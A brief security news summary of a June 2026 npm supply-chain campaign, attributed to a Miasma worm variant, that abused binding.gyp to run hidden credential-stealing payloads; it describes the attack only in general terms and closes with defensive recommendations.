Supply Chain Attack Hits Dozens of npm Packages via binding.gyp

On 2026-06-03 a coordinated npm supply-chain campaign (attributed to a Miasma worm variant) rapidly pushed malicious updates to dozens of high-impact packages using a novel "Phantom Gyp" technique that abuses binding.gyp to trigger node-gyp and execute hidden payloads. The multi-stage malware obfuscates payloads, deploys the Bun runtime to evade detection, harvests secrets from CI runners and cloud/local credential stores, and exfiltrates data to attacker-controlled GitHub repos (account: liuende501); indicators include multiple SHA-256 file hashes, Bun download patterns, and C2 repository paths. Organizations should audit dependencies, monitor build-time activity, rotate exposed tokens, and deploy runtime protections capable of detecting non-traditional execution vectors.